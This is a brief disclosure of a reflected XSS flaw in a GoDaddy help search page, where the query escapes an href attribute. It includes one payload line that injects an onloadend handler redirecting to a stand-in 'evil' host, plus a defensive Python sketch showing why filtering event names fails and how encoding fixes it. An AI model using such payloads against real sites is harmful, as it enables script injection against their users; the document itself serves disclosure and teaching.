XSS vulnerability through the help search results page.
The search query is sent as a GET parameter and is not escaped when rendered in the heading of the page, even though it is escaped immediately afterwards. This allows code to be executed directly from a malicious URL.
There was some protection: the site returned a 403 if you attempted to use onload or onhover events. This is a bad case of trying to filter specific JavaScript events in an attempt to prevent XSS.
<h1 class="app-title"><span>Showing results for </span><a href="//uk.godaddy.com/help/search?q=bob" onloadend="document.location=http://evil"><b><i>bob" onloadend="document.location=http://evil</i></b></a></h1>
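Added example (not code from the original report or from the site): a Python sketch of why the event-name filter does not help, next to a rendering that encodes the query for the href attribute. The filter regex and all function names are assumptions; the query string and heading markup are the ones shown above.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote

# The query string shown in the page's rendered heading.
PAYLOAD = 'bob" onloadend="document.location=http://evil'

# Assumed shape of the 403 filter: reject only the event names the page mentions.
BLOCKED = re.compile(r"\bon(load|hover)\s*=", re.IGNORECASE)
HEAD = '<h1 class="app-title"><span>Showing results for </span>'

def filter_allows(query):
    """True when the name-based filter would let the request through."""
    return BLOCKED.search(query) is None

def render_vulnerable(query):
    # Raw query inside the href attribute; only the visible text is escaped.
    return (HEAD + f'<a href="//uk.godaddy.com/help/search?q={query}">'
            f'<b><i>{html.escape(query)}</i></b></a></h1>')

def render_hardened(query):
    # Percent-encode for the URL, then HTML-escape for the attribute context.
    href = "//uk.godaddy.com/help/search?q=" + quote(query, safe="")
    return (HEAD + f'<a href="{html.escape(href, quote=True)}">'
            f'<b><i>{html.escape(query)}</i></b></a></h1>')

class _AnchorAttrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.names = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.names = [name for name, _ in attrs]

def anchor_attributes(markup):
    """Attribute names an HTML parser sees on the <a> element."""
    parser = _AnchorAttrs()
    parser.feed(markup)
    return parser.names

if __name__ == "__main__":
    print("filter allows payload:", filter_allows(PAYLOAD))
    print("vulnerable:", anchor_attributes(render_vulnerable(PAYLOAD)))
    print("hardened:  ", anchor_attributes(render_hardened(PAYLOAD)))
```

The vulnerable rendering gives the anchor a second attribute because the quote in the query closes href early; the hardened rendering leaves a single href whatever the query contains, so no list of event names is needed.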
Reported Fixed Unknown